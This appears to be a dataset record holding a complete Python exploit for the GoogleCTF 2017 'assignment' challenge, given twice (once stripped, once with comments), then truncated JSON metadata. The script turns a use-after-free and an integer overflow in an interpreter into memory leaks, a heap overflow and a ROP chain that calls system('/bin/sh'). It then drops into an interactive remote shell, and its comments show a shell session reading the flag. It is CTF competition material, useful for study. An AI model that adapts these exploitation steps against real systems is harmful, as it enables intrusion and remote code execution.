NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
"""
if len(self._buf) < n:
buf = self._s.recv(65536)
if not buf and not self._buf:
raise DisconnectException('Server disconnected.')
if self._verbose:
self._prettyprint(buf, False)
self._buf += buf
buf = self._buf[:n]
self._buf = self._buf[n:]
return buf
def recvn(self, n):
"""Return exactly n bytes of data from the remote end."""
data = []
while len(data) != n:
data.append(self.recv(1))
return b''.join(data)
@bytes_and_strings_are_cool
def recvtil(self, delim):
"""Read data from the remote end until delim is found in the data.
The first occurance of delim is included in the returned buffer.
"""
buf = b''
while not delim in buf:
buf += self.recv(1)
return buf
def recvregex(self, regex):
"""Receive incoming data until it matches the given regex.
Returns the match object.
IMPORTANT: Since the data is coming from the network, it's usually
a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
will return as soon as 'addr: 0xf' is read. Instead, make sure to
end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
"""
if isinstance(regex, str):
regex = re.compile(regex)
buf = ''
match = None
while not match:
buf += d(self.recv(1))
match = regex.search(buf)
return match
def recvline(self):
"""Receive and return a line from the remote end.
The trailing newline character will be included in the returned buffer.
"""
return self.recvtil('\n')
def send(self, buf):
"""Send all data in buf to the remote end."""
if self._verbose:
self._prettyprint(buf, True)
self._s.sendall(buf)
def sendnum(self, n):
"""Send the string representation of n followed by a newline character."""
self.sendline(str(n))
@bytes_and_strings_are_cool
def sendline(self, l):
"""Prepend a newline to l and send everything to the remote end."""
self.send(l + b'\n')
def interact(self):
"""Interact with the remote end: connect stdout and stdin to the socket."""
self._verbose = False
try:
while True:
available, _, _ = select.select([sys.stdin, self._s], [], [])
for src in available:
if src == sys.stdin:
data = sys.stdin.buffer.read1(1024)
self.send(data)
else:
data = self.recv(4096)
sys.stdout.buffer.write(data)
sys.stdout.flush()
except KeyboardInterrupt:
return
except DisconnectException:
print_info('Server disconnected.')
return
def telnet(shell='/bin/bash'):
"""Telnet emulation.
Opens a PTY on the remote end and connects the master side to the socket.
Then spawns a shell connected to the slave end and puts the controlling TTY
on the local machine into raw mode.
Result: Something similar to a telnet/(plaintext)ssh session.
Vim, htop, su, less, etc. will work with this.
!!! This function only works if the channel is connected to a shell !!!
"""
assert sys.stdin.isatty()
c.setVerbose(False)
code = "import pty; pty.spawn(['{}', '-i'])".format(shell)
sendline('python -c "{}"; exit'.format(code))
time.sleep(0.5)
old_settings = termios.tcgetattr(sys.stdin.fileno())
tty.setraw(sys.stdin)
cols, rows = os.get_terminal_size(sys.stdin.fileno())
sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
recvtil('READY\r\n')
recvtil('READY\r\n')
interact()
termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
def send(b):
c.send(b)
def sendline(l):
c.sendline(l)
def sendnum(n):
c.sendnum(n)
def recv(n):
return c.recv(n)
def recvtil(delim):
return c.recvtil(delim)
def recvn(n):
return c.recvn(n)
def recvline():
return c.recvline()
def recvregex(r):
return c.recvregex(r)
def interact():
c.interact()
<|reserved_special_token_0|>
def evl(code):
sendline(code)
def readvar(name):
evl('=')
recvtil('Bad token: 0-1\n> ')
evl(name)
response = recvtil('> ')
return response.split(b'\n')[0]
def readintvar(name):
return int(d(readvar(name)))
def readstrvar(name):
return readvar(name)[1:-1]
def heapleak():
"""Free the lhs and rhs values during add_assign. ..."""
for i in range(16):
evl('{}'.format(i))
evl('h=0+0')
return readintvar('h') & 18446744073709547520
def gc(remaining):
"""Trigger gargabe collection"""
for i in range(remaining):
evl('{}'.format(i))
def leak(addr, length):
"""Leaks process memory by abusing the UAF to temporarily inject a fake string."""
fake_str_addr = heap_base + 176
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"')
for i in range(15):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
gc(16)
return readstrvar('a')[0:length]
def leak2(addr, length):
"""Same as above, but different offsets..."""
fake_str_addr = heap_base + 368
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"')
for i in range(12):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
return readstrvar('a')[0:length]
def pwn():
global heap_base
recvtil('>')
evl('x="XXXXXXXXXXXXXXXX"')
heap_base = heapleak()
print_good('Heap base @ 0x{:x}'.format(heap_base))
evl('"{}"'.format('A' * 256))
gc(20 - 4)
heap_mem = leak(heap_base, 4096)
for i in range(0, len(heap_mem) - 16, 8):
flink = u64(heap_mem[i:i + 8])
blink = u64(heap_mem[i + 8:i + 16])
if (abs(flink - heap_base) > 65536 and flink > 139637976727552 and
flink < 140737488355328 and blink > 139637976727552 and blink <
140737488355328):
break
else:
print_bad('No freelist pointers found :(')
return
libc = flink - 3938600
print_good('libc @ 0x{:x}'.format(libc))
env_ptr = u64(leak2(libc + 3949728, 8))
print_good('stack @ 0x{:x}'.format(env_ptr))
system = libc + 288144
bin_sh = libc + 1573123
pop_rdi = libc + 142234
pop_rsi = libc + 149637
pop_rdx = libc + 7054
add_rsp_0x48 = libc + 1006475
print_good('/bin/sh @ 0x{:x}'.format(bin_sh))
input_buf = env_ptr - 808
print_good('input_buf @ 0x{:x}'.format(input_buf))
ret_addr = env_ptr - 808 - 8
print_good('return address @ 0x{:x}'.format(ret_addr))
evl('l.a=x')
evl('h.a=x')
evl('a.a=x')
evl('b.a=x')
evl('c.a=x')
evl('d.a=x')
evl('e.a=x')
evl('f.a=x')
for i in range(9):
evl('"{}"'.format('A' * 16))
evl('1337')
for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
for p in ALPHABET:
evl('{}.{}=x'.format(o, p))
for i in range(6):
evl('1337')
for i in 'ghijk':
evl('{}=x'.format(i))
fake_str = p64(18446744073709551615 - 15 - (384 - 16)) + p64(71748523475265
) + b'D' * 240
evl(b'n="' + fake_str + b'"')
payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 256) + p64(
input_buf - 7)
payload += b'\x00' * (384 - len(payload))
evl(b'o="' + payload + b'"')
fake_str_addr = heap_base + 7808
evl('p=o+{}'.format(fake_str_addr))
payload = b'A' * 256
payload += p64(1) + p64(input_buf + 16 + 256 + 24) + p64(0)
payload += p64(8) + p64(ret_addr)
evl(payload)
binary = readstrvar('p')
binary = u64(binary) - 2769
print_good('binary @ 0x{:x}'.format(binary))
offset_to_ret = ret_addr - (input_buf & 18446744073709551360)
print_good('offset to return address: 0x{:x}'.format(offset_to_ret))
if offset_to_ret > 40 or offset_to_ret < 0:
print_bad('Bad offset')
return
prop_name = p64(binary + 2761)[1]
if prop_name < ord('A') or prop_name > ord('z'):
print_bad('Bad propery name: {}'.format(prop_name))
return
prop_name = chr(prop_name)
print_good('property name: {}'.format(prop_name))
payload = b'A' * 56
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system)
validate(payload, [b'\n'])
evl(payload)
evl('{}=42'.format(prop_name))
payload = b'A' * offset_to_ret
payload += p64(add_rsp_0x48)
validate(payload, [b'\n'])
evl(payload)
time.sleep(0.5)
interact()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a
# pointer into the heap by confusing an Integer Value with a Property. It then
# abuses the UAF differently to create a fake String instance which is
# concatenated and returned. By faking a String in the heap, we can read
# arbitrary memory. We leak the addresses of libc and the stack. Next the
# exploit does some heap feng shui, then fakes a string with length 0xffffffXX,
# which triggers an integer overflow during string_concat(). This gives us a
# heap-based buffer overflow. With that we first corrupt a Property to point
# into the stack, then overwrite the length of the fake string with 0 to stop
# the memcpy. We leak the address of the binary from the return address. Next
# we write a value to the fake property. This writes a pointer to the heap into
# the stack. With that we corrupt only the first byte of the input buffer
# pointer so it now points further down into the stack. The next call to
# readline() by the application then writes into the stack frame of readline()
# and ultimately overwrites the return address => we get ROP:
#
# [+] Heap base @ 0x55cd3d465000
# [+] libc @ 0x7f7ea1f79000
# [+] stack @ 0x7ffcf044f448
# [+] /bin/sh @ 0x7f7ea20f9103
# [+] input_buf @ 0x7ffcf044f120
# [+] return address @ 0x7ffcf044f118
# [+] binary @ 0x55cd3c696000
# [+] offset to return address: 0x18
# [+] property name: j
# id
# uid=1337(user) gid=1337(user) groups=1337(user)
# ls
# assignment
# flag.txt
# cat flag.txt
# CTF{d0nT_tHrOw_0u7_th1nG5_yoU_5ti11_u53}
#
# Author: Samuel <saelo> Groß
#
import socket
import termios
import tty
import time
import sys
import select
import os
import re
import telnetlib
import string
from struct import pack, unpack
from binascii import hexlify, unhexlify
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#TARGET = ('localhost', 4444)
TARGET = ('assignment.ctfcompetition.com', 1337)
# Enable "wireshark" mode, pretty prints all incoming and outgoing network traffic.
NETDEBUG = False
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Encoding and Packing
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def e(d):
"""Encode the given string instance using UTF-8."""
return d.encode('UTF-8')
def d(d):
"""Decode the given bytes instance using UTF-8."""
return d.decode('UTF-8')
def p32(d):
"""Return d packed as 32-bit unsigned integer (little endian)."""
return pack('<I', d)
def u32(d):
"""Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian)."""
return unpack('<I', d)[0]
def p64(d):
"""Return d packed as 64-bit unsigned integer (little endian)."""
return pack('<Q', d)
def u64(d):
"""Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian)."""
return unpack('<Q', d)[0]
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Output
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def print_good(msg):
print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))
def print_bad(msg):
print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))
def print_info(msg):
print('[*] ' + msg)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Misc.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def bytes_and_strings_are_cool(func):
"""Decorator to encode arguments that are string instances."""
def inner(*args, **kwargs):
nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else arg, args))
nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else (k, v), kwargs))
return func(*nargs, **nkwargs)
return inner
def validate(data, badchars):
"""Assert that no badchar occurs in data."""
assert(all(b not in data for b in badchars))
def is_printable(b):
"""Return true if the given byte is a printable ASCII character."""
return b in e(string.printable)
def hexdump(data):
"""Return a hexdump of the given data. Similar to what `hexdump -C` produces."""
def is_hexdump_printable(b):
return b in b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
lines = []
chunks = (data[i*16:i*16+16] for i in range((len(data) + 15) // 16))
for i, chunk in enumerate(chunks):
hexblock = ['{:02x}'.format(b) for b in chunk]
left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])
asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for b in chunk)
lines.append('{:08x} {:23} {:23} |{}|'.format(i*16, left, right, asciiblock))
return '\n'.join(lines)
class Term:
COLOR_BLACK = '30'
COLOR_RED = '31'
COLOR_GREEN = '32'
COLOR_BROWN = '33'
COLOR_BLUE = '34'
COLOR_MAGENTA = '35'
COLOR_CYAN = '36'
COLOR_WHITE = '37'
CLEAR = '0'
UNDERLINE = '4'
BOLD = '1'
ESCAPE_START = '\033['
ESCAPE_END = 'm'
# TODO rename to style and append Term.Clear ?
def ansi(*args):
"""Construct an ANSI terminal escape code."""
code = Term.ESCAPE_START
code += ';'.join(args)
code += Term.ESCAPE_END
return code
class DisconnectException(Exception):
pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Pattern Generation
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Pattern:
"""De-Bruijn sequence generator."""
alphabet = string.digits + string.ascii_letters
def __init__(self, length):
if length <= len(self.alphabet):
self._seq = self.alphabet[:length]
elif length <= len(self.alphabet) ** 2:
self._seq = self._generate(2)[:length]
elif length <= len(self.alphabet) ** 3:
self._seq = self._generate(3)[:length]
elif length <= len(self.alphabet) ** 4:
self._seq = self._generate(4)[:length]
else:
raise Exception("Pattern length is way to large")
def _generate(self, n):
"""Generate a De Bruijn sequence."""
# See https://en.wikipedia.org/wiki/De_Bruijn_sequence
k = len(self.alphabet)
a = [0] * k * n
sequence = []
def db(t, p):
if t > n:
if n % p == 0:
sequence.extend(a[1:p + 1])
else:
a[t] = a[t - p]
db(t + 1, p)
for j in range(a[t - p] + 1, k):
a[t] = j
db(t + 1, t)
db(1, 1)
return ''.join(self.alphabet[i] for i in sequence)
def bytes(self):
"""Return this sequence as bytes."""
return e(self._seq)
def __str__(self):
"""Return this sequence as string."""
return self._seq
@bytes_and_strings_are_cool
def offset(self, needle):
"""Returns the index of 'needle' in this sequence.
'needle' should be of type string or bytes. If an integer is provided
it will be treated as 32-bit or 64-bit little endian number, depending
on its bit length.
"""
if isinstance(needle, int):
if needle.bit_length() <= 32:
needle = p32(needle)
else:
needle = p64(needle)
needle = d(needle)
idx = self._seq.index(needle)
if self._seq[idx+len(needle):].find(needle) != -1:
raise ValueError("Multiple occurances found!")
return idx
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Network
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Channel:
"""Convenience wrapper around a socket."""
OUTGOING_COLOR = Term.COLOR_RED
INCOMING_COLOR = Term.COLOR_BLUE
def __init__(self, sock, verbose):
self._s = sock
self._verbose = verbose
self._buf = bytearray()
def _prettyprint(self, data, outgoing):
"""Prettyprint the given data.
This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
Everything else is converted to hex, then printed in bold and underline for visibility.
Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
detected in arbitrary binary streams.
"""
TEXT = 0
BINARY = 1
# Various Thresholds for the heuristics below
X = 4
Y = 16
Z = 2
color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
# Step 1: Tag every byte of the input stream with it's detected type.
parts = []
curr = ''
for b in data:
if is_printable(b):
parts.append((TEXT, b))
else:
parts.append((BINARY, b))
# Step 2: Merge neighboring bytes of the same type and convert the sequences to type bytes.
i = 0
mergedparts = []
while i < len(parts):
t = parts[i][0]
arr = [parts[i][1]]
j = i+1
while j < len(parts) and parts[j][0] == t:
arr.append(parts[j][1])
j += 1
i = j
# Heuristic: If there are Y ASCII bytes with the same value followed by Z ASCII bytes followed by binary data, treat the Z bytes as binary as well.
extra = []
if t == TEXT and len(arr) > Y and i < len(parts) - 1:
mid = len(arr) - Z - 1
start, end = mid, mid
char = arr[mid]
while start >= 0 and arr[start] == char:
start -= 1
while end < len(arr) and arr[end] == char:
end += 1
# start and end point outside the range of equal-valued characters now.
if end - start >= Y+2 and end < len(parts):
extra = arr[end:]
arr = arr[:end]
mergedparts.append((t, bytes(arr)))
if extra:
mergedparts.append((BINARY, bytes(extra)))
parts = mergedparts
# Step 3: Merge all parts and prepend the ansi terminal escape sequences for the given type.
buf = ''
last = None
for tag, value in parts:
# Heuristic: If there is an ASCII sequence of X bytes or less surrounded by binary data, treat those as binary as well.
if tag == TEXT and len(value) <= X and last == BINARY:
tag = BINARY
if tag == TEXT:
buf += ansi(Term.CLEAR) + ansi(color)
else:
buf += ansi(color, Term.BOLD, Term.UNDERLINE)
value = hexlify(value)
buf += d(value)
last = tag
buf += ansi(Term.CLEAR)
# Step 4: Print :)
print(buf, end='')
sys.stdout.flush()
def setVerbose(self, verbose):
"""Set verbosity of this channel."""
self._verbose = verbose
def recv(self, n=4096):
"""Return up to n bytes of data from the remote end.
Buffers incoming data internally.
NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
"""
if len(self._buf) < n:
buf = self._s.recv(65536)
if not buf and not self._buf:
raise DisconnectException("Server disconnected.")
if self._verbose:
self._prettyprint(buf, False)
self._buf += buf
# This code also works if n > len(self._buf)
buf = self._buf[:n]
self._buf = self._buf[n:]
return buf
def recvn(self, n):
"""Return exactly n bytes of data from the remote end."""
data = []
while len(data) != n:
data.append(self.recv(1))
return b''.join(data)
@bytes_and_strings_are_cool
def recvtil(self, delim):
"""Read data from the remote end until delim is found in the data.
The first occurance of delim is included in the returned buffer.
"""
buf = b''
# TODO maybe not make this O(n**2)...
while not delim in buf:
buf += self.recv(1)
return buf
def recvregex(self, regex):
"""Receive incoming data until it matches the given regex.
Returns the match object.
IMPORTANT: Since the data is coming from the network, it's usually
a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
will return as soon as 'addr: 0xf' is read. Instead, make sure to
end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
"""
if isinstance(regex, str):
regex = re.compile(regex)
buf = ''
match = None
while not match:
buf += d(self.recv(1))
match = regex.search(buf)
return match
def recvline(self):
"""Receive and return a line from the remote end.
The trailing newline character will be included in the returned buffer.
"""
return self.recvtil('\n')
def send(self, buf):
"""Send all data in buf to the remote end."""
if self._verbose:
self._prettyprint(buf, True)
self._s.sendall(buf)
def sendnum(self, n):
"""Send the string representation of n followed by a newline character."""
self.sendline(str(n))
@bytes_and_strings_are_cool
def sendline(self, l):
"""Prepend a newline to l and send everything to the remote end."""
self.send(l + b'\n')
def interact(self):
"""Interact with the remote end: connect stdout and stdin to the socket."""
# TODO maybe use this at some point: https://docs.python.org/3/library/selectors.html
self._verbose = False
try:
while True:
available, _, _ = select.select([sys.stdin, self._s], [], [])
for src in available:
if src == sys.stdin:
data = sys.stdin.buffer.read1(1024) # Only one read() call, otherwise this breaks when the tty is in raw mode
self.send(data)
else:
data = self.recv(4096)
sys.stdout.buffer.write(data)
sys.stdout.flush()
except KeyboardInterrupt:
return
except DisconnectException:
print_info("Server disconnected.")
return
#
# Telnet emulation
#
def telnet(shell='/bin/bash'):
"""Telnet emulation.
Opens a PTY on the remote end and connects the master side to the socket.
Then spawns a shell connected to the slave end and puts the controlling TTY
on the local machine into raw mode.
Result: Something similar to a telnet/(plaintext)ssh session.
Vim, htop, su, less, etc. will work with this.
!!! This function only works if the channel is connected to a shell !!!
"""
assert(sys.stdin.isatty())
c.setVerbose(False)
# Open a PTY and spawn a bash connected to the slave end on the remote side
code = 'import pty; pty.spawn([\'{}\', \'-i\'])'.format(shell)
sendline('python -c "{}"; exit'.format(code))
time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...
# Should maybe put some more functionality into the inline python code instead.
# Save current TTY settings
old_settings = termios.tcgetattr(sys.stdin.fileno())
# Put TTY into raw mode
tty.setraw(sys.stdin)
# Resize remote terminal
# Nice-to-have: also handle terminal resize
cols, rows = os.get_terminal_size(sys.stdin.fileno())
sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
recvtil('READY\r\n') # terminal echo
recvtil('READY\r\n') # command output
interact()
# Restore previous settings
termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
#
# Convenience wrappers that use the global socket instance
#
def send(b):
c.send(b)
def sendline(l):
c.sendline(l)
def sendnum(n):
c.sendnum(n)
def recv(n):
return c.recv(n)
def recvtil(delim):
return c.recvtil(delim)
def recvn(n):
return c.recvn(n)
def recvline():
return c.recvline()
def recvregex(r):
return c.recvregex(r)
def interact():
c.interact()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Setup
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
s = socket.create_connection(TARGET)
#s.settimeout(2)
c = Channel(s, NETDEBUG)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Your code here
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ALPHABET = 'abcdefghijklmnopqrstuvwxyz'
def evl(code):
sendline(code)
def readvar(name):
evl('=')
recvtil('Bad token: 0-1\n> ')
evl(name)
response = recvtil('> ')
return response.split(b'\n')[0]
def readintvar(name):
return int(d(readvar(name)))
def readstrvar(name):
return readvar(name)[1:-1]
def heapleak():
"""Free the lhs and rhs values during add_assign. ..."""
for i in range(16):
evl('{}'.format(i))
# Trigger heap info leak
evl('h=0+0')
return readintvar('h') & 0xfffffffffffff000
def gc(remaining):
"""Trigger gargabe collection"""
for i in range(remaining):
evl('{}'.format(i))
def leak(addr, length):
"""Leaks process memory by abusing the UAF to temporarily inject a fake string."""
fake_str_addr = heap_base + 0xb0
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(15):
evl('{}'.format(i))
# 19 slots filled
# allocate 20th slot with integer value containing the addr of our fake string. The allocate_value() during do_add_assign triggers GC and frees the lhs value
# Then the output value is allocated into the same slot. Since the output value is String (type of x),
# lhs is turned into a string with controlled pointer
evl('a={}+x'.format(fake_str_addr))
gc(16)
return readstrvar('a')[0:length]
def leak2(addr, length):
"""Same as above, but different offsets..."""
fake_str_addr = heap_base + 0x170
fake_str = p64(length) + p64(addr)
evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
for i in range(12):
evl('{}'.format(i))
evl('a={}+x'.format(fake_str_addr))
return readstrvar('a')[0:length]
def pwn():
global heap_base
recvtil('>')
evl('x="XXXXXXXXXXXXXXXX"') # Workaround, need global object or else GC will crash
# 2 slots always filled from now on (global object and int value 1337)
heap_base = heapleak()
# 3 slots always filled from now on
print_good("Heap base @ 0x{:x}".format(heap_base))
# Create a smallbin chunk so we can leak a libc pointer
evl('"{}"'.format('A' * 0x100))
gc(20 - 4)
# Leak freelist pointers pointing into the libc
heap_mem = leak(heap_base, 0x1000)
for i in range(0, len(heap_mem)-16, 8):
# Search for 2 consecutive pointers, those will be the flink and blink of the freed smallbin chunk
flink = u64(heap_mem[i:i+8])
blink = u64(heap_mem[i+8:i+16])
if (abs(flink - heap_base) > 0x10000 and
flink > 0x7f0000000000 and
flink < 0x800000000000 and
blink > 0x7f0000000000 and
blink < 0x800000000000):
break
else:
print_bad("No freelist pointers found :(")
return
libc = flink - 0x3c1928
print_good("libc @ 0x{:x}".format(libc))
# Leak stack pointer by reading environ pointer in libc
env_ptr = u64(leak2(libc + 0x3c44a0, 8))
print_good("stack @ 0x{:x}".format(env_ptr))
# Calculate addresses
system = libc + 0x46590
bin_sh = libc + 0x180103
pop_rdi = libc + 0x22b9a
pop_rsi = libc + 0x24885
pop_rdx = libc + 0x1b8e
add_rsp_0x48 = libc + 0xf5b8b
print_good("/bin/sh @ 0x{:x}".format(bin_sh))
input_buf = env_ptr - 0x328
print_good("input_buf @ 0x{:x}".format(input_buf))
ret_addr = env_ptr - 0x328 - 8
print_good("return address @ 0x{:x}".format(ret_addr))
# 5 slots always filled from now
#
# Heap spray with Property instances to get a controlled heap layout again
#
# Make some objects
evl('l.a=x')
evl('h.a=x')
evl('a.a=x')
evl('b.a=x')
evl('c.a=x')
evl('d.a=x')
evl('e.a=x')
evl('f.a=x')
# Trigger GC
for i in range(9):
evl('"{}"'.format('A' * 0x10))
evl('1337')
# 10 slots used
# Allocate lots of properties (but no values)
for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
for p in ALPHABET:
evl('{}.{}=x'.format(o, p))
# Set up heap layout for unbounded heap overflow. We need the following layout:
# | chunk to overflow from | ... | Property to corrupt | ... | Fake string |
# We overflow into "Fake string" to set it's size to 0 and avoid a segfault.
for i in range(6):
evl('1337')
# Create some properties
for i in 'ghijk':
evl('{}=x'.format(i))
# Fake string with length 0xffffffXX => leads to an integer overflow during string_concat and subsequently a heap buffer overflow
fake_str = p64(0xffffffffffffffff - 0xf - (0x180 - 0x10)) + p64(0x414141414141) + b'D'*0xf0
evl(b'n="' + fake_str + b'"')
payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 0x100) +p64(input_buf-7)
payload += b'\x00' * (0x180 - len(payload))
evl(b'o="' + payload + b'"')
fake_str_addr = heap_base + 0x1e80
# Trigger the overflow
evl('p=o+{}'.format(fake_str_addr))
# Set up a fake string property in the stack ('p' points to it). We need to leak the binary base from the return address
payload = b'A' * 0x100
payload += p64(1) + p64(input_buf + 16 + 0x100 + 0x18) + p64(0)
payload += p64(8) + p64(ret_addr)
evl(payload)
binary = readstrvar('p')
binary = u64(binary) - 2769
print_good("binary @ 0x{:x}".format(binary))
offset_to_ret = ret_addr - (input_buf & 0xffffffffffffff00)
print_good("offset to return address: 0x{:x}".format(offset_to_ret))
# Some unfortunate restrictions...
if offset_to_ret > 0x28 or offset_to_ret < 0:
print_bad("Bad offset")
return
prop_name = p64(binary + 0xAC9)[1]
if prop_name < ord('A') or prop_name > ord('z'):
print_bad("Bad propery name: {}".format(prop_name))
return
prop_name = chr(prop_name)
print_good("property name: {}".format(prop_name))
# Write ROP chain into stack
payload = b'A' * 56
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system)
validate(payload, [b'\n'])
evl(payload)
# Trigger corruption of InputBuffer.ptr to point further down in the stack
evl('{}=42'.format(prop_name))
# Next input will be written into the stack frame of readline(). Overwrite the return address with "add rsp, 0x48 ; ret"
payload = b'A'*offset_to_ret
payload += p64(add_rsp_0x48)
validate(payload, [b'\n'])
evl(payload)
# Wait a short while and drop into interactive mode == shell
time.sleep(0.5)
interact()
if __name__ == '__main__':
pwn()
|
flexible
|
{
"blob_id": "e4a05cbfd0959402eacf21959c68e449d15b1e74",
"index": 7651,
"step-1": "<mask token>\n\n\ndef e(d):\n \"\"\"Encode the given string instance using UTF-8.\"\"\"\n return d.encode('UTF-8')\n\n\n<mask token>\n\n\ndef u32(d):\n \"\"\"Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian).\"\"\"\n return unpack('<I', d)[0]\n\n\n<mask token>\n\n\ndef validate(data, badchars):\n \"\"\"Assert that no badchar occurs in data.\"\"\"\n assert all(b not in data for b in badchars)\n\n\n<mask token>\n\n\ndef hexdump(data):\n \"\"\"Return a hexdump of the given data. Similar to what `hexdump -C` produces.\"\"\"\n\n def is_hexdump_printable(b):\n return (b in\n b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\\\|\\'\";:/?.,<>'\n )\n lines = []\n chunks = (data[i * 16:i * 16 + 16] for i in range((len(data) + 15) // 16))\n for i, chunk in enumerate(chunks):\n hexblock = ['{:02x}'.format(b) for b in chunk]\n left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])\n asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' for\n b in chunk)\n lines.append('{:08x} {:23} {:23} |{}|'.format(i * 16, left,\n right, asciiblock))\n return '\\n'.join(lines)\n\n\nclass Term:\n COLOR_BLACK = '30'\n COLOR_RED = '31'\n COLOR_GREEN = '32'\n COLOR_BROWN = '33'\n COLOR_BLUE = '34'\n COLOR_MAGENTA = '35'\n COLOR_CYAN = '36'\n COLOR_WHITE = '37'\n CLEAR = '0'\n UNDERLINE = '4'\n BOLD = '1'\n ESCAPE_START = '\\x1b['\n ESCAPE_END = 'm'\n\n\n<mask token>\n\n\nclass DisconnectException(Exception):\n pass\n\n\nclass Pattern:\n \"\"\"De-Bruijn sequence generator.\"\"\"\n alphabet = string.digits + string.ascii_letters\n\n def __init__(self, length):\n if length <= len(self.alphabet):\n self._seq = self.alphabet[:length]\n elif length <= len(self.alphabet) ** 2:\n self._seq = self._generate(2)[:length]\n elif length <= len(self.alphabet) ** 3:\n self._seq = self._generate(3)[:length]\n elif length <= len(self.alphabet) ** 4:\n self._seq = self._generate(4)[:length]\n else:\n raise Exception('Pattern length is way to large')\n\n def _generate(self, n):\n \"\"\"Generate a De Bruijn sequence.\"\"\"\n k = len(self.alphabet)\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n db(1, 1)\n return ''.join(self.alphabet[i] for i in sequence)\n\n def bytes(self):\n \"\"\"Return this sequence as bytes.\"\"\"\n return e(self._seq)\n\n def __str__(self):\n \"\"\"Return this sequence as string.\"\"\"\n return self._seq\n\n @bytes_and_strings_are_cool\n def offset(self, needle):\n \"\"\"Returns the index of 'needle' in this sequence.\n\n 'needle' should be of type string or bytes. If an integer is provided\n it will be treated as 32-bit or 64-bit little endian number, depending\n on its bit length.\n \"\"\"\n if isinstance(needle, int):\n if needle.bit_length() <= 32:\n needle = p32(needle)\n else:\n needle = p64(needle)\n needle = d(needle)\n idx = self._seq.index(needle)\n if self._seq[idx + len(needle):].find(needle) != -1:\n raise ValueError('Multiple occurances found!')\n return idx\n\n\nclass Channel:\n \"\"\"Convenience wrapper around a socket.\"\"\"\n OUTGOING_COLOR = Term.COLOR_RED\n INCOMING_COLOR = Term.COLOR_BLUE\n\n def __init__(self, sock, verbose):\n self._s = sock\n self._verbose = verbose\n self._buf = bytearray()\n\n def _prettyprint(self, data, outgoing):\n \"\"\"Prettyprint the given data.\n\n This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.\n Everything else is converted to hex, then printed in bold and underline for visibility.\n\n Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be\n detected in arbitrary binary streams.\n \"\"\"\n TEXT = 